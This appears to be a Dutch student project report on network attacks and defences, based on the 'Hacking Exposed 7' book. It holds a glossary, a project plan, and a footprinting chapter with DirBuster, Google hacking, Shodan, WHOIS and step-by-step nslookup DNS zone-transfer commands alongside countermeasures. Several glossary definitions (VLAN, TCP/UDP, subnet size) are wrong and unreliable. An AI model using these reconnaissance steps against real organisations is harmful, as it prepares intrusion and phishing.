Administrator privileges: als je administrator privileges hebt, heb je vele rechten en kan je zo goed als alles doen op het betreffende toestel. Dit houdt in, programma’s instaleren, wijzigen en verwijderen.
Advanced pakket filtering: advanced pakket filtering is een techniek dat gebruikt wordt door een Firewall. Hierbij zal er naar de pakketten gekeken worden. Als de pakketten een bepaald soort pakket zijn dan worden ze niet toegelaten door de firewall.
Authentication: bij authenticatie zal je identiteit gecontroleerd worden.
Authorsisation: bij autorisatie wordt aan de hand van je identiteit beslist welke rechten je krijgt op het systeem.
Banner: als je connectie maakt met een poort zal er meestal een welkomstbericht of een errorbericht te zien zijn. Een bericht dat je krijgt bij het connecteren met een poort krijgt, wordt een banner genoemd.
Broadcast: dit is een bericht dat naar al de toestellen binnen het lokale netwerk gestuurd wordt. Dit lokale netwerk wordt afgebakend door een router of Virtual Local Area Network (VLAN).
Broncode: broncode is de code waaruit een website is opgebouwd.
Brute-forcen: als je een wachtwoord wil achterhalen, probeer je zoveel mogelijk willekeurige wachtwoorden uit. Dit doe je meestal aan de hand van een tekstbestand met mogelijke wachtwoorden die je dan inlaadt in een bepaald programma.
CLI/opdrachtprompt: Command Line Interface, dit is een manier van interactie met een computer op een tekst gebaseerde manier.
Client: in een client-server model is dit het toestel dat gegevens van de server vraagt.
Cryptographic Transaction Signatures: dit is een protocol dat ervoor zal zorgen dat je je eerst moet bekendmaken vooraleer er een DNS update kan plaatsvinden. De DNS-server waarvan je de zone transfer wilt van uitvoeren zal dan je identiteit controleren.
Data-link: dit is de tweede laag uit het OSI-model en zal zorgen voor het transport van data over een verbinding. De adressering hierbij gebeurt op basis van het MAC-adres.
DHCP server: een DHCP server is een server die dynamisch IP-adressen zal uitdelen aan toestellen in het netwerk.
Dial-in attack: in veel bedrijven wordt er gebruikt gemaakt van een dail-in methode om van op afstand voor het bedrijf te werken. Door dit soort van aanval zou je als hacker kunnen binnendringen in een netwerk.
DNS-server: het netwerk is opgebouwd uit IP-adressen. Om het voor de eindgebruiker gemakkelijk te maken wordt er gebruik gemaakt van Domain Name Resolving. Dit zal een IP-adres “vertalen” naar een website naam en omgekeerd. Een DNS-server is dus een server waar de zich de mapping bevindt tussen de IP-adressen en de namen van de websites.
23
© Nathan Boone
DOS aanval: dit is een Denial Of Service aanval, dit soort aanval heeft als doel om ervoor te zorgen dat mensen die normaal iets moeten bereiken op een netwerk dit niet meer kunnen doen. Een voorbeeld hiervan is als jij naar een website wil gaan en die website is down omdat er een DOS aanval tegen plaatsvindt. In dit geval zal een persoon zoveel mogelijk connecties proberen te openen met de webserver zodat deze geen nieuwe connecties meer aankan.
Exploit: dit is een kwetsbaarheid dit gebruikt wordt voor slechte doeleinden.
Firewall: een firewall is een systeem dat een netwerk beveiligd tegen aanvallen van buitenaf.
Gefilterde poort: dit is een poort dat gefilterd is door de firewall. Dit wil zeggen dat de firewall zo ingesteld is om geen verkeer toe te laten via die bepaalde netwerkpoort.
Gesloten poort: een gesloten poort wil zeggen dat de service dat achter deze netwerkpoort zit niet aanwezig is.
GUI: Graphical User Interface, dit is een manier van interactie met een computer op een grafische manier.
Half open connectie: bij zo een connectie is er een deel van de three-way-handshake gedaan maar niet helemaal. Hierdoor kan er geen verkeer verstuurd worden. Als er veel half-open connecties openstaan op je toestel kan je ervan uitgaan dat er ofwel een netwerkscan uitgevoerd wordt ofwel dat er een DOS aanval plaatsvindt.
HINFO: dit laat toe om het hardware type en besturingssysteem van een host bij te houden op een DNS-server.
Hop: als je naar een website gaat op het internet zal je verschillende routers passeren voor je je bestemming bereikt. Elke keer als je naar een volgende router gaat doe je een hop. Als gebruiker merk je hier niets van.
Host: dit is een toestel dat zich bevindt op het netwerk.
HTML: Hyper Text Markup Language. Dit is de opmaaktaal voor websites.
Hub: een hub is een toestel dat al het verkeer dat naar hem gestuurd wordt zal doorsturen op al zijn fysieke poorten.
IANA: Internet Assigned Numbers Authority, dit is een instantie dat de IP-adressen beheert over heel de wereld.
Image/IOS: dit is het besturingssysteem van een netwerkapparaat.
Initiator: dit is het toestel dat de verbinding zal starten (initiëren).
Intrusion Detection System: dit is een systeem dat het netwerkverkeer zal analyseren en zo proberen het verdachte verkeer te melden. Dit systeem zal het verdachte verkeer niet uit het netwerk halen maar dit systeem zal enkel laten weten dat er verdacht verkeer is.
IP-adres: elk toestel dat verbonden is met het internet heeft een uniek IP-adres, dit is een cijfercombinatie. Door middel van dit IP-adres kunnen de toestellen onderling communiceren.
ISP: Internet Service Provider, dit is een bedrijf dat ervoor zal zorgen dat de eindgebruikers op het internet kunnen. Enkele voorbeelden in België zijn: Belgacom en Telenet.
Key: dit is een soort sleutel dat kan gebruikt worden bij het encrypteren van gegevens.
24
© Nathan Boone
Loggen: het bijhouden van gebeurtenissen die doorgaan op de computer. Dit kan een foutenlog zijn dat al de fouten die gebeuren op een computer bijhoudt.
Lookup requests: dit is de vraag van een naam voor een bijbehorend IP-adres te weten te komen. Deze requests zullen afgehandeld worden door een DNS-server.
Metadata: dit is al de data dat zich rond een document bevindt. Enkele voorbeelden zijn de auteur, de grootte en de datum dat het document aangemaakt is.
Multicast: dit is wanneer je een bericht stuurt over het netwerk naar meerdere van vooraf gekende toestellen.
Nameblock: een blok aan IP-adressen met hun bijhorende naam in een DNS-server.
Namelookup: het opzoeken van een bijhorend IP-adres in een DNS-server.
Netwerkpoort: elke service die op je computer aanwezig is heeft een bijhorende poort. Als je naar een website surft, zal je via poort 80 gaan. Dit is de poort van http.
Nonce: dit is een random gegenereerd nummer dat als het doorgestuurd wordt van de initiator naar de responder ondertekend zal worden. Hierdoor kan de identiteit gewaarborgd woren.
Open poort: dit een poort waarachter zich een service bevindt. Als bijvoorbeeld poort 23 openstaat dan weet je dat je dat toestel kan bedienen door Telnet te gebruiken.
Pakket: dit is binaire data dat door een computernetwerk gaat. Naargelang het protocol dat gebruikt wordt zal het pakket een andere vorm en andere eigenschappen hebben.
Patch: als je een toestel patcht zal je een update uitvoeren waardoor de exploit teniet gedaan wordt.
Promicious mode: promicious mode is een toestand waarin je je NIC kan brengen om al het verkeer dat voorbij komt af te luisteren.
Proxy server: een proxy server is een server waarlangs je kan gaan zodat een derde partij niet aan je echte IP-adres kan geraken. Deze proxy server zal je een ander IP-adres geven.
Reply: dit is een antwoord, dit volgt meestal op een request.
Request: dit is een vraag, dit gaat meestal voor op een replay.
Responder: dit is het toestel dat zal antwoorden aan de initiator.
Reverse lookups: normaal gezien als je een lookup doet bij een DNS-server zal je vragen om een naam om te zetten in een IP-adres. Je kan ook een IP-adres geven en wat de bijhorende naam is.
RIR: Regional Internet Register, dit zijn organisaties over heel de wereld dat IP-adressen zullen uitdelen aan de verschillende ISP’s.
Root access: als je root acces bekomt, heb je toegang tot heel het toestel. Dit wil zeggen dat je alles kan doen met dat toestel. Een voorbeeld is het jailbreaken van een IPhone.
Router: dit is een toestel dat zich op een network bevindt dat ervoor zal zorgen dat er connectiviteit mogelijk is tussen verschillende netwerken.
Security association (SA): dit is een groep van beveiligingsmethoden.
25
© Nathan Boone
Server: dit is een toestel waar een service op staat. Als jij naar een website surft zal je van jouw computer (client) naar een andere computer (server) surfen. Wat je op je scherm te zien krijgt download je eigenlijk van die server.
Sessie: een voltooide three-way-handshake.
Shell: een shell is een command prompt interface.
Sniffer: met een sniffer kan je netwerkverkeer afluisteren.
Statefull firewall: een statefull firewall zal onthouden naar welke website je geweest bent en zal verkeer dat terugkomt van die bepaalde website doorlaten. Op deze manier wordt er geen verkeer binnengelaten in het netwerk dat je zelf niet eerst gevraagd hebt.
Strings: dit is een opeenvolging van karakters. Je kan een string gebruiken als zoekterm in google om zo resultaten te krijgen over toestellen dat kwetsbaar zijn.
Subnet mask: met een subnet mask word teen grootte van een netwerk beslist. Als je subnet mask 255.255.255.0 is dan kan je gebruik maken van 255 IP-adressen in je netwerk.
TCP header: een TCP header is een onderdeel van een pakket en bevat meestal de “source IP-adres” en “destination IP-adres”.
TCP: dit is een soort netwerkpoort.
Three-way-handshake: dit zijn de drie stappen die doorlopen moeten worden voordat er een TCP-connectie van start gaat.
UDP: dit is een soort netwerkpoort.
Unicast: bij een unicast zal je een bericht sturen aan maar één enkele host.
VLAN: dit is een Virtual Private Network, hiermee kan een broadcastdomein beperken. Je maakt eigenlijk verschillende LAN’s die je dan later onderling met elkaar kan verbinden.
WHOIS pagina: dit is een pagina om de gegevens van een domeinnaam of IP-adres te achterhalen door deze te zoeken in een databank.
26
© Nathan Boone
Prince 2TM - Project Initiation Document
Project Name: Hacking Exposed Release Date Author: Callebaut Dries 24/01/2014
Boone Nathan Owner: Callebaut Dries
Boone Nathan Client: iMinds (Van Maele Andy)
Document Number: 001
1 Project Definition Het project houdt in dat de twee teamleden met behulp van de methodiek "Hacking Exposed", dat nauw aanleunt met het materiaal in het boek "Hacking Exposed 7" door de auteurs Stuart McClure, Joel Scambray en George Kurtz, een goed begrip hebben van netwerkbedreigingen en de nodige voorzorgsmaatregelen kunnen treffen om een een klein tot middelgroot netwerk te beveiligen.
De leerstof zal verder behandeld worden door zelfgemaakte cases, waarbij kennis aan te pas komt die is vergaard door de methodiek te hebben bestudeerd.
2 Background iMinds is een bedrijf, o.l.v. de Vlaamse Overheid, dat veel onderzoek doet naar communiceren, en in het bijzonder netwerkcommunicatie. Ze zijn benieuwd naar de mogelijkheden van hun "virtual wall", en stellen dit ter beschikking voor geïnteresseerden. Hierdoor is het mogelijk dat ze projecten voorstellen, waar studenten hun kennis kunnen testen.
Het project zal de deelnemers voorbereiden om een use case dat voldoet aan de eisen van niveau 6 te maken, wat vereist is om het project tot een goed einde te brengen.
3 Project objectives • Netwerkaanvallen begrijpen en bestuderen• In een gecontroleerde testomgeving netwerkbeveiliging toepassen• Als hacker optreden om de zelfgemaakte netwerkbeveiliging te testen, en eventueel daarna
aan te passen
27
© Nathan Boone
4 Desired outcomes In de eerste plaats zullen de teamleden de leerstof van “Hacking Exposed” begrijpen, zodat ze een goede basis hebben om met de cases te beginnen.
Vervolgens zullen de teamleden de verschillende cases met succes afronden, en al hun bevindingen noteren. Deze ervaring zal hun helpen bij toekomstige projecten en situaties.
Uiteindelijk zullen de resultaten van de cases enerzijds het succesvol infiltreren van een niet beschermd netwerk zijn, en anderzijds het beveiligen van het netwerk zodat verdere pogingen tot infiltreren mislukken.
5 Project scope and exclusions De volgende delen en hoofdstukken, zijn delen en hoofdstukken uit het boek “Hacking Exposed 7”.
In scope Out of scope Boek Hacking Exposed 7 bestuderen Een samenvatting van het boek 3 cases uitwerken omtrent netwerkbeveiliging
Deel 2 Hoofdstuk 4
Relevante leerstof en andere items noteren Deel 2 Hoofdstuk 6 Deel 1 Deel 3 Hoofdstuk 7 (alles buiten VPN) Deel 2 Hoofdstuk 5 Deel 3 Hoofdstuk 9 Deel 3 Hoofdstuk 7 VPN Deel 4 Deel 3 Hoofdstuk 8
6 Constraints and assumptions Om de kwaliteit van het project te garanderen wordt er na elk doorgenomen hoofdstuk een document gemaakt met daarin de meest interessante onderdelen.
Het domein dat de methode “Hacking Exposed” omvat is te breed. We zullen dus 5 cases bedenken en hiervan zullen we er 3 uitwerken.
De einddatum is het einde van het eerste semester van het derde jaar Toegepaste Informatica
7 The user(s) and any other known interested parties Hogeschool Universiteit Brussel
De heer Andy Van Maele: opdrachtgever
De heer Yvan Rooseleer: opleidingshoofd
Serge Van Cleynenbreugel: Mentor
Dries Callebaut: student
Nathan Boone: student
28
© Nathan Boone
8 Interfaces Voor we konden beginnen aan ons project was het noodzakelijk om het boek Hacking Exposed 7 in ons bezit te hebben.
Voor de cases werd er een gecontroleerde testomgeving gecreëerd met behulp van netwerkmateriaal behorende tot de Hogeschool Universiteit Brussel. Tot dit materiaal behoren routers, switches, bijhorende kabels en het schoolnetwerk.
9 Project Approach Om ons project tot een goed einde te brengen hebben we fasering gebruikt.
• Fase 1: boek Hacking Exposed 7 onderzoeken en bestuderen, waarna belangrijke en interessante delen genoteerd worden.
• Fase 2: 5 cases bedenken • Fase 3: 3 cases uitwerken
10 Project Management Team Structure
Andy Van Maele
Opdrachtgever
Nathan Boone
Projectleider
Dries CallebautProjectleider
Gert Van CauwenbeghProjectbegeleider
Yvan RooseleerProjectbegeleider
Serge Van Cleynenbreugel
Project mentor
29
© Nathan Boone
11 Role Descriptions Opdrachtgever: Andy Van Maele
Projectleider(s): Dries Callebaut en Nathan Boone
Mentor: Serge Van Cleynenbreugel
Project begeleider(s): Yvan Rooseleer en Gert Van Cauwenbergh
R: Responsible (verantwoordelijk)
A: Accountable (eindverantwoordelijk)
C: Consulted (geraadpleegd)
I: Informed (geinformeerd)
O: Out of loop (niet betrokken)
RACI-chart Opdrachtgever Projectleider Mentor Project begeleider Cases maken I R A I I Cases goedkeuren R A I I PID maken O R A I I PID goedkeuren O A R R Project opvolgen O I R A Leveren eindresultaat A R I I
12 Quality Management Strategy We zullen de kwaliteit van ons project garanderen door:
• Na elke stap uit de methodiek “Hacking Exposed” bestudeerd te hebben een documentopmaken waarin de belangrijkste zaken beschreven en uitgelegd staan.
• Verder zullen er op willekeurige momenten worden gevraagd aan de projectbegeleidersom de huidige staat van de documentatie goed te keuren.
• Er worden 3 cases opgesteld, waarna deze voorgesteld worden aan de opdrachtgever omde meest toepasselijke cases te vinden. Pas daarna voeren we de cases effectief uit. Ditheeft als gevolg dat elke case over voldoende uitdagingen beschikt, maar tegelijkertijdniet te moeilijk wordt.
• De versies van de projectdocumentatie worden individueel bijgehouden en individueelvoorzien van naamgeving.
30
© Nathan Boone
13 Configuration Management Strategy • Het geheel van de documenten wordt gedeeld via Skydrive (https://skydrive.live.com/).
De gekozen teksteditor is Microsoft Word.• Elke projectdeelnemer beheert over rechten om de documenten aan te passen en te
verwijderen.• Versiebeheer wordt geregeld via manuele classificatie, waarbij de datum telkens wordt
meegedeeld samen met de naam van de editor.• Wat we bespreken in de documenten zal via spontane vergaderingen worden beslist,
alsook tijdens de lessen "IT-project".• Er zal een eenmalige vergadering gebeuren om de kwaliteit van de 5 cases te bespreken,
waarbij een scoringscriterium aan te pas komt en 3 cases uiteindelijk gekozen worden.
14 Risk Management Strategy Enkele risico’s verbonden aan ons project:
Risico Kans (max 10)
Impact (max 10)
Totaal (max 100)
Niet behalen deadline 5 8 40 Onvoldoende fysiek materiaal voor uitvoering cases
2 7 14
Verliezen van documenten 1 9 9
15 Communication Management Strategy De twee teamleden hebben allebei de verantwoordelijkheid om als team de projectmentor te contacteren voor minstens één afspraak.
De communicatie gebeurt eenmaal per maand op een dag dat afgesproken wordt op de vorige vergadering. De eerste vergadering zal gebeuren om de gevonden cases en voortgang van het project te bespreken.
De informatie dat we bijhouden zijn de datums van de vergaderingen, samen met de afgesproken punten. Analyse van stakeholders zal het eerste punt zijn dat zal besproken worden.
In het geval van vergadering met een derde persoon zal er telkens één noteerder zijn, terwijl het andere teamlid de communicatie regelt. De middelen die worden gebruikt zijn pen en papier, of een laptop indien aanwezig. De technieken die worden gebruikt richten zich op het snel en duidelijk informeren tegenover de contactpersoon, zodat feedback vlot kan verlopen. Na elke vergadering zullen de nota's overlopen worden door de teamleden, om te kijken of er niets over het hoofd is gezien.
31
© Nathan Boone
16 Project Plan Het project verloopt in drie fasen:
Fase 1: methodiek “Hacking Exposed 7” bestuderen
De methodiek “Hacking Exposed 7” zoals bestaat uit 4 grote stappen waarvan we 3 gaan bespreken.
Stap 1 Casing the Establishment
Footprinting: Het binnenbreken in een bedrijf om informatie te vergaren, samen met de voorzorgsmaatregelen.
Enumeration: IP-adressen die gebruikt kunnen worden, poorten die openstaan, etc.. gebruiken om zwaktes te vinden en analyseren.
Stap 2 Endpoint and Server Hacking
Hacking UNIX: Het uitvoeren van enkele technieken om FTP servers te hacken, samen met de bijpassende verdedigingen.
Stap 3 Infrastructure Hacking
Twee soorten hacking worden hier besproken: VPN en Wireless Hacking. Ook hier worden veiligheidsmaatregelen besproken.
Wij zullen stappen 1, 2 en 3 bestuderen en documenteren. We zullen dit doen door gebruik te maken van Word documenten die gedeeld worden op Skydrive.
Fase 2: cases bedenken Als we het boek goed doorgenomen hebben zullen we cases bedenken. Deze cases zijn er zodat we kunnen testen dat we de vergaarde informatie ook wel degelijk kunnen gebruiken.
We zullen de cases opmaken en dan aan elke case een score geven. De case met de hoogste waarde zullen we als eerste maken.
Fase 3: cases uitwerken Als al de cases bedacht zijn en als er een score aan gegeven is kunnen we beginnen met de cases uit te werken. Hiervoor zullen we als bron onze opgedane kennis uit het boek Hacking Exposed 7 gebruiken.
17 Project Controls Na elke fase die gedefiniëerd staat in “Project Plan” zullen we een deliverable maken.
Fase 1 Na elk hoofdstuk zal er een word document gemaakt worden met onderdelen die kunnen helpen met het beter begrijpen van de methode "Hacking Exposed" uit het boek.
Fase 2 We zullen werken met een scoringscriterium. Door dit te gebruiken geven we elke case een waarde van 1 tot 10, waarbij 1 het minst haalbare en 10 het meest haalbare. Dit gebeurt onder leiding van de opdrachtgever.
Fase 3
De gekozen 3 cases zullen uitgewerkt worden in een virtuele en/of fysieke omgeving.
32
© Nathan Boone
Stap 1: Footprinting 1 Inleiding Je kan niet zomaar ergens binnenbreken en beginnen te hacken, want dit zou tot weinig succes leiden. Daarom is er een eerste stap, deze stap is het in kaart brengen van de onderneming of de persoon bij wie je wilt inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren voor je zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Dit laatste is bij hacking het allerbelangrijkste, maar ook het moeilijkste. Iedereen kan hacken, maar de persoon die geen sporen achterlaat is de beste hacker.
Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij wilt plegen.
2 Openbaar beschikbare informatie 2.1 Inleiding Er zijn verschillende manieren om meer te weten te komen over een bedrijf of een individu. Bij de ene manier laat dit al meer sporen achter dan bij de andere. Hieronder zal ik verschillende manieren bespreken.
2.2 Website 2.2.1 Commentaar Zo goed als elk bedrijf waarbij je zou kunnen binnenbreken heeft een website. Op deze website vind je veel nuttige informatie. Je zal deze informatie niet meteen vinden als je de website bezoekt maar wel als je naar de broncode kijkt. In deze broncode zal je soms commentaar terugvinden, in deze commentaar zijn er meestal nuttige zaken verstopt. Enkele zaken die je in de commentaar zou kunnen terugvinden zijn gegevens over wie de website gemaakt heeft, en andere zaken die de programmeur er als geheugensteuntjes ingestoken heeft.
Je kan dit het beste doen door de gehele website te downloaden en hier dan in te zoeken naar de commentaar (tags). In HTML= “<!-- -->”, in javascript= “//”.
UNIX/Linux: Wget (gnu.org/software/wget/wget.html) gratis
Windows: Teleport Pro (tenmax.com) betalend
2.2.2 Web Application Brute Forcing In de broncode van websites vind je soms ook verborgen mappen en bestanden. Het is moeilijk om deze zaken terug te vinden met het blote oog dus bestaat hier software voor. DirBuster van owasp is de software die we zullen gebruiken.
Je zal de website die je wilt brute-forcen moeten selecteren. Dan zal je een document moeten kiezen met mogelijke verborgen mappen of bestanden en dan zal DirBuster de website scannen.
Deze manier van brute-force laat veel sporen achter, er is dus ook een ingebouwde functie om een proxy in te stellen.
Windows, UNIX/Linux: DirBuster (owasp.org/index.php/Category:OWASP_DirBuster_Project)
33
© Nathan Boone
2.3 Google Maps Je kan de exacte positie van een bedrijf te weten komen door dit bedrijf op te zoeken via Google Maps. Zo achterhaal je de fysieke locatie.
Als je de fysieke locatie kent, kan je ter plaatse gaan en daar onderzoek doen naar het draadloos netwerk. Je kan bijvoorbeeld onderzoeken hoe dat netwerk beveiligd is. Je kan ook proberen je voor te doen als een medewerker of bezoeker en zo meer te weten komen over het bedrijf. Als ze je toelaten in een vergaderzaal en als er daar netwerkaansluitingen ter beschikking zijn, kan je via deze weg op het netwerk proberen te geraken.
2.4 Social Engineering Om meer te achterhalen over het bedrijf of een individu, kan je gebruik maken van “social engineering”. Dit betekent dat je de vele sociale netwerksites kan aflopen en zoeken naar de betreffende onderneming of persoon. Enkel sites die je kan bezoeken:
- Facebook.com - Myspace.com - Reunion.com - Classmates.com - Twitter.com - Linkedin.com - Plaxo.com - Monster.com - Careerbuilder.com - Dice.com - Ancestry.com - Flickr.com - Photobucket.com
De gegevens die je hiermee vindt, kunnen gebruikt worden bij het versturen van “phishing mails”. Dit zijn persoonlijke mails met kwaadaardige links.
2.5 Google Hacking Database (GHDB) Google is een zoekrobot waar zeer veel informatie te vinden is. Er bestaan verschillende zoekopdrachten waarmee je wachtwoorden kan achterhalen en foutief ingestelde servers kan terugvinden. Deze zoekopdrachten zijn te vinden op de GHDB.
Windows, UNIX/Linux: http://www.hackersforcharity.org/ghdb
2.5.1 SiteDigger SiteDigger is een programma waarmee je het internet automatisch kan laten doorzoeken met strings. Deze strings zijn te vinden in bovenstaande Google Hacking Database. Je kan ook een specifiek domein of een specifieke site kiezen.
Windows, UNIX/Linux: http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/sitedigger.aspx
34
© Nathan Boone
2.6 FOCA 3.2 Foca is een programma waarmee je de metadata van een bestand kan analyseren. Je kan hiermee veel te weten komen over de persoon die het document gemaakt heeft en over de programma’s die gebruikt zijn om het document te maken. Door het programma FOCA3.2 zelf uit te testen heb ik vastgesteld dat je er veel meer mee kan doen dan in het boek Hacking Exposed 7 beschreven staat. Zie de screenshot hieronder voor meer informatie.
Figuur 2-1 FOCA 3.2 Metadata
Windows, UNIX/Linux: http://www.informatica64.com/foca.aspx
2.7 Shodanhq Shodanhq is een zoekmachine om te zoeken naar toestellen, gaande van thuisrouters tot grote systemen die met het netwerk verbonden zijn.
Windows, UNIX/Linux: www.shodanhq.com
2.8 Forums Door te zoeken naar foute configuraties op Google of op forums, kan je veel te weten komen over bedrijven. Het is mogelijk dat een netwerkbeheerder met een firewall aan het sukkelen is en om een oplossing te vinden voor zijn probleem, de hele configuratie op het internet zet, zodat andere personen hem kunnen helpen om fouten te vinden. Deze configuratie kan gevoelige gegevens bevatten, o.a. IP-adressen, namen van gebruikers, enz.
2.9 Openbaar beschikbare informatie Tegenmaatregels Het is belangrijk dat je waar mogelijk informatie probeert te beperken. Dit is echter niet
gemakkelijk. Eens de informatie op het internet werd gezet, is het moeilijk om deze informatie weg te halen. Wat je wel kan doen is de informatie aanpassen of valse informatie gebruiken zodat de geïnteresseerden moeilijk de juiste gegevens vinden.
35
© Nathan Boone
3 WHOIS and DNS Enumeration WHOIS is een manier om een IP-adres te traceren. Je kan dit IP-adres traceren tot bij de Internet Serivce Provider (ISP) die het IP-adres uitgedeeld heeft. Eerst en vooral moet je beginnen bij Internet Assigned Numbers Authority (IANA), dit is de internationale verdeler van IP-adressen. IANA zal deze IP-adressen dan doorgeven en verdelen aan een bepaalde Regionale Internet Registers (RIR). Een RIR zal op haar beurt de IP-adressen verder onderverdelen naar grote bedrijven en ISP’s. Als je op IANA naar een IP-adres zoekt, dan zal je doorverwezen worden naar de WHOIS pagina van de RIR die het IP-adres uitgedeeld heeft. Als je op de WHOIS pagina van deze RIR verder gaat zoeken zal je meer informatie krijgen over het IP-adres. Je zal te weten komen wie dit IP-adres uitgedeeld heeft en je zult een contactpersoon krijgen. Dit zijn de verschillende Regionale Internet Registers met hun bijhorende WHOIS pagina:
IANA: http://www.iana.org/whois
ARIN: http://whois.arin.net/ui
LACNIC: http://lacnic.net/cgi-bin/lacnic/whois
AFRNIC: http://www.afrinic.net/en/services/whois-query
RIPE: https://apps.db.ripe.net/search/query.html
APNIC: http://wq.apnic.net/apnic-bin/whois.pl
36
© Nathan Boone
3.1 Opzoeken van een IP-adres Tegenmaatregels Als een organisatie een range van IP-adressen aanvraagt of een domein laat registreren, moet
deze organisatie of individu informatie verschaffen aan de RIR. Al deze informatie is terug te vinden als je een IP-adres opzoekt op de WHOIS pagina van de RIR. Een voorbeeld vindt je op de volgende pagina: figuur 3-1 WHOIS pagina www.hubrussel.net.
Wat je kan doen als tegenmaatregel is de informatie die je verstrekt beveiligen.
Bv het telefoonnummer dat je opgeeft is een telefoonnummer dat extra beveiligd wordt zodat er geen dial-in atttack kan plaatsvinden. Het beste wat je kan doen is een telefoonnummer en een e-mailadres aanmaken dat alleen maar dient voor deze WHOIS pagina. De gegevens die je verstrekt kan je dan observeren en op die manier te weten komen uit welke hoek er een aanval zou kunnen komen.
Je kunt op verschillende manieren de eigenschappen van je domein veranderen. Het is belangrijk dat je de veiligste manier kiest, anders zou het kunnen dat je domein gehijacket wordt. Dit wil zeggen dat ze al het verkeer naar je domein kunnen omleiden naar een ander domein.
Een veiligere manier om een domein op het internet te hebben is bij een domeinnaamverdeler een domeinnaam te kopen. Jouw informatie is dan veilig, alleen de informatie van de provider van de domeinnaam komt op de WHOS pagina. Een voorbeeld hiervan is: http://www.godaddy.com/?isc=gtnieu50&ci=13333
Figuur 3-1 WHOIS pagina www.hubrussel.net
37
© Nathan Boone
3.2 DNS Interrogatie 3.2.1 Zone transfers Een zone transfer bekent dat je een secundaire master server maakt waarmee je de zone database van de primaire master overneemt. Dit kan je gebruiken voor redundantie: als de primaire master server uitvalt, kan je de secundaire master server gebruiken als back-up. Het is dus een handig systeem, maar bij sommige configuraties is dit niet goed beveiligd. Hierdoor kan een onbevoegd iemand een zone transfer doen naar een fictieve secundaire master. Zo kan hij al de gegevens van die bepaalde DNS-server verkrijgen. Met deze gegevens zou de aanvaller heel het interne netwerk in kaart kunnen brengen.
Om een zone transfer te kunnen uitvoeren zal je op een netwerk moeten zijn waar lokaal een DNS-server aanwezig is. Er zijn verschillende manieren om dit te doen, manueel kan je het programma nslookup gebruiken die meestal meegeleverd is met Linux en Windows. Je kan ook geautomatiseerde tools gebruiken zoals dig, host of Sam Spade.
We zullen nslookup starten in interactieve modus. Je opent de Command Prompt in Windows of de terminal in Linux en dan typ je het commando nslookup:
nslookup Het programma nslookup is nu gestart en het eerste wat hij laat zien is de standaard ingestelde DNS-server. Als volgt definieer je de server naar wie je de zone transfer wilt uitvoeren, dus de secundaire server.
192.168.1.1 Hiermee zeg je dat je al de dns gegevens wil hebben.
Set type=any Met het volgend commando zal je al de gegevens van example.com nemen en die doorgeven aan het bestand zone_out zodat je er hiermee later nog kunt werken. Met het punt dat na example.com komt, maak je duidelijk dat het bij deze naam blijft.
Ls –d example.com. >\> /tmp/zone_out Als volgt kan je in dit bestand zoeken naar mogelijk kwetsbare systemen. Je kan in dit bestand zoeken naar interessante woorden zoals “test”, je kan dit doen met grep, sed, awk of perl. Hierdoor zal je meer gegevens vinden over testomgevingen. Deze testomgevingen zijn meestal minder goed beveiligd dan andere omgevingen.
Met de volgende tools kan je dit proces automatiseren:
Windows: Sam Spade (http://www.garykessler.net/library/is_tools_sam_spade.html )
UNIX/Linux: dig, host
Een andere goede tool om een dns-zone transfer te doen is dnsrecon. Deze tool zal een recursieve DNS-zone transfer doen. Deze tool kan je downloaden via de volgende link: https://github.com/darkoperator/dnsrecon
Bij al deze vorige tools moet de functie DNS-zone transfer aan staan op de primaire DNS-server. Dit is niet altijd het geval. De tool die je alsnog kan gebruiken is fierce.
Het host commando kan je ook gebruiken om te weten te komen waar de mail server staat. Deze staat meestal in hetzelfde netwerk als de firewall server. Waardoor je meteen een goede plaats hebt om je aanval te starten.
38
© Nathan Boone
3.2.2 DNS-zone transfer Tegenmaatregels Een goed tegenargument is om zone transfers alleen maar toelaten aan mensen die hiervoor
geautoriseerd zijn. Dit kan je doen door Cryptographic Transaction Signatures (TSIG) toe te passen.
Je kan eveneens de functie om zone transfers te doen volledig uitschakelen.
Je kan ook via een firewall alle inkomende connecties op TCP poort 53 weigeren, dit is de poort die nodig is om een zone transfer uit te voeren. Dit omdat de meeste lookup requests UDP zijn en een zone transfer is TCP.
Ondanks deze maatregelen is het nog altijd mogelijk om namelookups te doen. De aanvallers zouden dan reverse lookups kunnen doen naar al de IP adressen van een nameblock. Hierdoor zou je externe DNS-server nooit mogen configureren met informatie van het interne netwerk. Er wordt ook afgeraden om HINFO te gebruiken.
4 Network Reconnaissance Nu onze zoektocht naar potentiele netwerken gedaan is, kan je proberen de topologie van het netwerk te achterhalen. Je kan ook potentiële wegen vinden om tot in het netwerk binnen te dringen.
4.1 Tracerouting Traceroute is een tool waarmee je een IP pakket kan volgen. Per hop zal er uitleg verschijnen op je scherm waar dit IP pakket passeert.
Als er in de output van traceroute een “Request timed out.” verschijnt, dan weet je dat op die plaats het netwerk gefilterd wordt.
UNIX/Linux, Windows: traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.gz )
4.1.1 Hoe werkt traceroute? Traceroute gebruikt het TTL veld in het IP-pakket. Dit is het time to live veld, elke router waar dit pakket passeert zal het time to live veld laten zakken met 1.
TTL begint aan 1, het pakket passeert de eerste router dus zet deze dit TTL veld gelijk aan 0. Hierdoor stuurt deze router een ICMP TIME_EXCEEDED bericht terug.
Vervolgens is TTL 2, het pakket passeert dus terug de eerste router, deze verlaagt dit gegeven met 1 waardoor de TTL 1 is. Het pakket wordt dan nu doorgegeven naar de volgende router. Deze router zal de TTL ook verlagen met 1 waardoor de TTL op 0 komt te staan. Deze router zal dan op zijn beurt een ICMP TIME_EXCEEDED bericht terugsturen.
Het traceroute commando kan dan een volgend schema opbouwen door de IP pakketten te analyseren.
39
© Nathan Boone
GUI tools:
• Windows: tcptraceroute (michael.toren.net/code/tcptracerouting )• Windows: Cain & Abel (oxid.it )
4.2 Network Reconnaissance TegenmaatregelsEr bestaan verschillende tools om te detecteren of iemand een scan doet van uw network. De
twee tools die ik zal bespreken zijn Network Intrusion Detection Systems (NIDS) en Intrusion Prevention Systems (IPS).
